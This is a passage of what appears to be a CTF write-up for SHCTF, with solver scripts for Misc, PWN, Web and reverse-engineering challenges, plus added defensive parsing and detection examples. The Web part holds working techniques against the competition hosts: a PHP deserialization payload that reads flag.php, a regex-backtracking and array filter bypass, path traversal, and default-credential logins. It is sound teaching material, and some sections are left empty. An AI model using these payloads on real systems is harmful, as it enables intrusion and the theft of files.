    file2_path = r"C:\Users\g0ubu1i\Desktop\SHCTF\Misc\WEEK1\可爱的派蒙捏\_1.jpg.extracted\txt2.txt"
    file1_content = read_file(file1_path)
    file2_content = read_file(file2_path)
    flag = compare_files(file1_content, file2_content)
    print(flag)

The flag is:

flag{4ebf327905288fca947a}

[WEEK1] message

Challenge:

0001000D91683106019196F40008C26211002072B975915730671B54114F60000A000A592982B15C065265843D8A938A00000A000A5E8A9AA453D883525730000A000A91527CBE518D6E1751656CEA75D5000A000A6C899ED852305BF94E0D8D77000A000A8FD94E0053CC624B535191195230002062B14F4F4F6000530048004300540046007B00620061003900370038003400300035002D0062003100630038002D0038003400370063002D0038006500360039002D006600360032003100370037006500340063003000380037007D

Hex-decoding it directly gives:

S H C T F { b a 9 7 8 4 0 5 - b 1 c 8 - 8 4 7 c - 8 e 6 9 - f 6 2 1 7 7 e 4 c 0 8 7 }
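
The gaps between the letters appear because the hex string is an SMS-SUBMIT PDU whose user data is UCS-2, two bytes per character, so a plain hex dump shows a NUL byte in front of every Latin letter. The parser below is an added example, not part of the original write-up: it walks the PDU fields as laid out in 3GPP TS 23.040 and decodes the text, assuming no validity-period field and no user-data header, which holds for this PDU.

```python
# Added example: parse the challenge's SMS-SUBMIT PDU (field layout per 3GPP TS 23.040).
# PDU copied from the challenge above, split into chunks for readability.
PDU = (
    "0001000D91683106019196F40008C2"
    "6211002072B975915730671B54114F60000A000A"
    "592982B15C065265843D8A938A00000A000A"
    "5E8A9AA453D883525730000A000A"
    "91527CBE518D6E1751656CEA75D5000A000A"
    "6C899ED852305BF94E0D8D77000A000A"
    "8FD94E0053CC624B535191195230002062B14F4F4F60"
    "00530048004300540046007B"
    "00620061003900370038003400300035002D"
    "0062003100630038002D0038003400370063002D"
    "0038006500360039002D"
    "006600360032003100370037006500340063003000380037007D"
)


def swap_nibbles(octets):
    """Semi-octet digits: each byte holds two digits, low nibble first; F pads."""
    return "".join(f"{b & 0x0F:X}{b >> 4:X}" for b in octets).rstrip("F")


def parse_sms_submit(pdu_hex):
    raw = bytes.fromhex(pdu_hex)
    pos = 1 + raw[0]                      # skip SMSC info (length 0 = default SMSC)
    first = raw[pos]
    pos += 1
    if (first & 0x03) != 0x01:
        raise ValueError("not an SMS-SUBMIT PDU")
    if (first >> 3) & 0x03 or first & 0x40:
        raise ValueError("validity period / user-data header not handled here")
    pos += 1                              # TP-MR, message reference
    digits, toa = raw[pos], raw[pos + 1]  # destination address length and type
    pos += 2
    octets = (digits + 1) // 2
    number = swap_nibbles(raw[pos:pos + octets])
    if (toa >> 4) & 0x07 == 1:            # type-of-number: international
        number = "+" + number
    pos += octets
    pid, dcs, udl = raw[pos], raw[pos + 1], raw[pos + 2]
    pos += 3
    if (dcs & 0x0C) != 0x08:
        raise ValueError("only UCS-2 user data is handled in this example")
    user_data = raw[pos:pos + udl]        # for UCS-2, TP-UDL counts octets
    if len(user_data) != udl:
        raise ValueError("user data shorter than TP-UDL")
    return {"number": number, "pid": pid, "dcs": dcs, "udl": udl,
            "text": user_data.decode("utf-16-be")}


if __name__ == "__main__":
    sms = parse_sms_submit(PDU)
    print(sms["dcs"], sms["udl"])
    print(sms["text"])
```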

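[WEEK1] Real Check-in

Follow the official account.

[WEEK1] Far Away Yet Right in Front of You

After downloading the archive, the flag turns out to be hidden in the folder names, in reverse:
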
}\d\1\f\a\9\1\7\c\4\a\d\4\_\?\t\H\9\I\R\l\A\_\y\S\a\E\_\y\1\I\A\e\r\_\5\I\_\5\1\H\T\{\g\a\l\f

# Drop the backslash separators (ord 92), then reverse the remaining characters.
strr = r'}\d\1\f\a\9\1\7\c\4\a\d\4\_\?\t\H\9\I\R\l\A\_\y\S\a\E\_\y\1\I\A\e\r\_\5\I\_\5\1\H\T\{\g\a\l\f'
flag =''
for i in strr:
    if ord(i) != 92:
        flag += i
print(flag[::-1])

After processing we get:

flag{TH15_I5_reAI1y_EaSy_AlRI9Ht?_4da4c719af1d}

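[WEEK1] Strange Screenshot

This looks like CVE-2023-28303; use a tool to restore the screenshot.

The result is

a Hundred Family Surnames cipher (百家姓密码), which decodes to:
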
flag{CVE-2023-28303-Win11-Snipping-t00l-is-n0t-Secure}
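
CVE-2023-28303 is the Windows Snipping Tool flaw in which saving a cropped image over an existing file does not truncate it, so the tail of the old file stays on disk after the new image's end marker. The following added example (not part of the original write-up) shows the matching check: walk the PNG chunks and report any bytes after IEND. Both PNGs are constructed in the code to simulate the overwrite.

```python
# Added example: detect leftover data after the PNG IEND chunk.
import hashlib
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def chunk(ctype, payload):
    """Serialize one PNG chunk: length, type, data, CRC-32 over type + data."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def make_png(width, height):
    """Build a constructed 8-bit grayscale PNG filled with pseudo-random pixels."""
    rows = b""
    for y in range(height):
        noise = hashlib.sha256(bytes([y % 256])).digest()
        rows += b"\x00" + (noise * (width // len(noise) + 1))[:width]  # filter 0 + pixels
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)
    return (PNG_SIG + chunk(b"IHDR", ihdr)
            + chunk(b"IDAT", zlib.compress(rows)) + chunk(b"IEND", b""))


def trailing_data(data):
    """Return the bytes that follow the first IEND chunk (empty for a clean file)."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack_from(">I4s", data, pos)
        end = pos + 12 + length
        if end > len(data):
            raise ValueError("truncated chunk")
        (crc,) = struct.unpack_from(">I", data, end - 4)
        if crc != zlib.crc32(data[pos + 4:end - 4]) & 0xFFFFFFFF:
            raise ValueError("CRC mismatch in chunk " + repr(ctype))
        pos = end
        if ctype == b"IEND":
            return data[pos:]
    raise ValueError("no IEND chunk found")


def simulate_overwrite(old, new):
    """Write `new` over `old` without truncating the file."""
    return new + old[len(new):]


OLD = make_png(64, 64)                    # constructed "original screenshot"
NEW = make_png(8, 8)                      # constructed "cropped" image
ON_DISK = simulate_overwrite(OLD, NEW)    # what the file looks like afterwards

if __name__ == "__main__":
    for label, blob in (("clean", NEW), ("overwritten", ON_DISK)):
        print(label, len(trailing_data(blob)), "bytes after IEND")
```

A non-zero count on a screenshot that should be a single image means the file still carries part of an earlier, larger image and should be re-saved to a new file before sharing.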

[WEEK2] The Code in the Sheet

Edit the sheet.xml file so that the table is 29x29, treat cells with s=4 as 1 and all others as 0, then render the QR code with Pillow.

from PIL import Image
from xml.dom.minidom import parse

xml_file = r"sheet2.xml"
strings = ""
domtree = parse(xml_file)
rootNote = domtree.documentElement
# Every <c> element is one cell; style s="4" marks a dark module.
row = rootNote.getElementsByTagName('c')
for i in row:
    c = i.toxml()
    if 's="4"' in c:
        strings += '1'
    else:
        strings += '0'
pic = Image.new("RGB", (29, 29))
num = 0
for x in range(29):
    for y in range(29):
        if strings[num] == '1':
            pic.putpixel((x, y), (0, 0, 0))
        else:
            pic.putpixel((x, y), (255, 255, 255))
        num += 1

pic.show()

Scanning the code gives:

flag{j0k3r_1s_my_wif3}

[WEEK2] Cute Roxy

The downloaded archive is pseudo-encrypted; use 010 Editor to change 09 to 00.

This gives roxy.txt:

/9j/4AAQSkZJRgABAQEAYABgAAD/4REYRXhpZgAATU0AKgAAAAgABwEAAAMAAAABA+gAAAEBAAMAAAABBkAAAAESAAMAAAABAAAAAAEyAAIAAAABAAAAAIdpAAQAAAABAAAIepyfAAEAAABOAAAQwuocAAcAAAgYAAAAYgAAAAAc6gAAAAgAAAAAAAAc6gAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

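Base64-decoding it produces an image.

Opening the image in 010 Editor reveals a ciphertext and a key:

Ciphertext: 33736c6e6f7b52626b795f71696966686b76217d
key:nanian

First hex-decode the ciphertext, then decrypt with the Vigenère cipher to get:
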
flag{Roxy_daisuki!}
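
The pseudo-encryption step at the start of this challenge, as an added example that is not part of the original write-up: a ZIP entry is marked as encrypted by bit 0 of its general-purpose flag word, so setting that bit on plain data makes tools ask for a password. The code reads the flag words of an archive constructed in memory, clears the bit, and uses the CRC check to tell a fake flag from real encryption.

```python
# Added example: spot and undo ZIP pseudo-encryption on a constructed archive.
import io
import struct
import zipfile


def entry_flags(data):
    """Yield (name, central flag offset, local flag offset) for every entry."""
    eocd = data.rfind(b"PK\x05\x06")
    if eocd < 0:
        raise ValueError("no end-of-central-directory record")
    count, _size, pos = struct.unpack_from("<HII", data, eocd + 10)
    for _ in range(count):
        if data[pos:pos + 4] != b"PK\x01\x02":
            raise ValueError("bad central directory header")
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", data, pos + 28)
        (local,) = struct.unpack_from("<I", data, pos + 42)
        name = data[pos + 46:pos + 46 + name_len].decode("utf-8", "replace")
        yield name, pos + 8, local + 6     # flag word offsets in each header
        pos += 46 + name_len + extra_len + comment_len


def read_flags(data):
    """Map entry name to (central flag word, local flag word)."""
    return {name: (struct.unpack_from("<H", data, c)[0],
                   struct.unpack_from("<H", data, l)[0])
            for name, c, l in entry_flags(data)}


def set_encrypted_bit(data, value):
    """Set or clear bit 0 of the flag word in every central and local header."""
    out = bytearray(data)
    for _name, c_off, l_off in entry_flags(data):
        for off in (c_off, l_off):
            (flags,) = struct.unpack_from("<H", out, off)
            flags = (flags | 1) if value else (flags & 0xFFFE)
            struct.pack_into("<H", out, off, flags)
    return bytes(out)


def is_pseudo_encrypted(data):
    """True if entries are flagged encrypted but verify once the bit is cleared."""
    if not any((c | l) & 1 for c, l in read_flags(data).values()):
        return False
    try:
        with zipfile.ZipFile(io.BytesIO(set_encrypted_bit(data, False))) as zf:
            return zf.testzip() is None    # every CRC-32 matches: never encrypted
    except Exception:
        return False                       # data does not decode: really encrypted


def build_sample():
    """Constructed archive with one plain entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("roxy.txt", "constructed sample content\n" * 4)
    return buf.getvalue()


PLAIN = build_sample()
FAKE = set_encrypted_bit(PLAIN, True)      # same data, encryption bit forced on

if __name__ == "__main__":
    print(read_flags(FAKE), is_pseudo_encrypted(FAKE))
```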

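[WEEK2] Secret of the Picture

Carve the challenge file with binwalk to get an image.

Use the blind-watermark tool fft to recover the flag.

[FINAL] Questionnaire

Follow the official account and fill in the questionnaire to get the flag.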

PWN

[WEEK1] nc

Connect with nc and run cat flag to get the flag.

[WEEK1] Mental Arithmetic

After connecting with nc the service asks for calculations; a pwntools script answers them and gets the flag.

from pwn import *

p = remote('112.6.51.212', 31745)
p.sendafter(b'start...', b'\n')
p.recvuntil(b'\n')
s = p.recv()
# The service prints the UTF-8 signs × and ÷; map them to Python operators.
s = s.replace(b"\xc3\x97", b"*")
s = s.replace(b"\xc3\xb7", b"/")
answer = eval(s[:-4])  # drop the last 4 bytes that follow the expression
p.sendline(str(answer).encode())
for i in range(199):
    p.recvuntil(b'\n')
    p.recvuntil(b'\n')
    s = p.recv()
    s = s.replace(b"\xc3\x97", b"*")
    s = s.replace(b"\xc3\xb7", b"/")
    answer = eval(s[:-4])
    p.sendline(str(answer).encode())

Web

[WEEK1] babyrce

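First use ls to look at the path.

Then bypass the filter to cat flag.

[WEEK1] 1zzphp

First bypass the filter on num by passing it as an array, then get c_ode past its check by exceeding the regex backtracking limit. A Python script retrieves the flag:
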
import requests
url = 'http://112.6.51.212:30662//?num[]=m'
payload = {'c_ode':'1111'*260000+'2023SHCTF'}

response = requests.post(url=url, data=payload)
print(response.text)

[WEEK1] ez_serialize

payload:

O:1:%22B%22:1:{s:1:%22q%22;O:1:%22C%22:2:{s:3:%22var%22;N;s:1:%22z%22;O:1:%22D%22:1:{s:1:%22p%22;O:1:%22A%22:1:{s:5:%22var_1%22;s:57:%22php://filter/read=convert.base64-encode/resource=flag.php%22;}}}}

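This returns the contents of flag.php, base64-encoded.

After decoding we get

[WEEK1] Log In and Get the Flag

Logging in with the weak credentials admin/password gives the flag.

[WEEK1] Plane War

Looking at main.js gives

After decoding we get:
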
flag{e6cc550d-2a12-47a5-a890-0d522755548e}

[WEEK1] ezphp

[WEEK1] Generate Your Invitation

import requests
from PIL import Image
import io
url = 'http://112.6.51.212:32990/generate_invitation'

Body = {
    "name": "g0ubu1i",
    "imgurl": "http://q.qlogo.cn/headimg_dl?dst_uin=1738327323&spec=640&img_type=jpg"
}
re = requests.post(url=url,json=Body)
image_content = re.content
image = Image.open(io.BytesIO(image_content))
image.save("avator.jpg")

The flag is on the generated invitation.

[WEEK2] EasyCMS

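Log in to the admin backend with the default credentials admin/tao.

Get the flag through the arbitrary file read vulnerability.

In the backend, click any download and capture the request, then change the download path to …/…/…/flag

The flag downloads successfully.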

[WEEK3] Quick Q&A

Use Python to fetch each arithmetic expression and submit the answer, and eventually obtain the flag.

import re
import requests
import time

s = requests.Session()
url = 'http://112.6.51.212:31025/'
r = s.get(url)
r.encoding = 'utf-8'
for w in range(50):
    # Pull the expression out of the question heading on the page.
    num = re.findall(re.compile(r'<h3>题目:(.*?)='), r.text)[0]
    time.sleep(1)
    temp = ''
    # Translate the page's operators into Python ones.
    for i in num:
        if i == "÷":
            temp += "//"
        elif i == "与":  # AND
            temp += "&"
        elif i == "x":
            temp += "*"
        elif i == "异":  # first character of 异或 (XOR)
            temp += "^"
        elif i == "或":  # second character of 异或, already handled
            pass
        else:
            temp += i
    num = temp
    r = s.post(url, data={'answer': eval(num)})
    print(r.text)

RE

[WEEK1]signin

Open the challenge in IDA to get the flag.

[WEEK2] pycode

The challenge gives a py file; write a decryption script that reverses it:

import base64
value = ''
flag = ''
obfuscated_output = '==AeAF3M-tzO-giQ-AUQosDQ9tGK7MDPuhC47tDNB5Tb8Yn4sdW4'
obfuscated_output= obfuscated_output.replace('t','0')
obfuscated_output = obfuscated_output.replace('4','c')
obfuscated_output = obfuscated_output.replace('-', '+')
output = base64.b64decode(obfuscated_output[::-1]).decode()
# Undo the +3 shift on every character.
for i in range(len(output)):
    temp = output[i]
    temp = chr(ord(temp) - 3)
    value += temp
# Undo the XOR with 8.
for i in range(len(value)):
    temp = value[i]
    temp = chr(ord(temp) ^ 8)
    flag += temp
print(flag)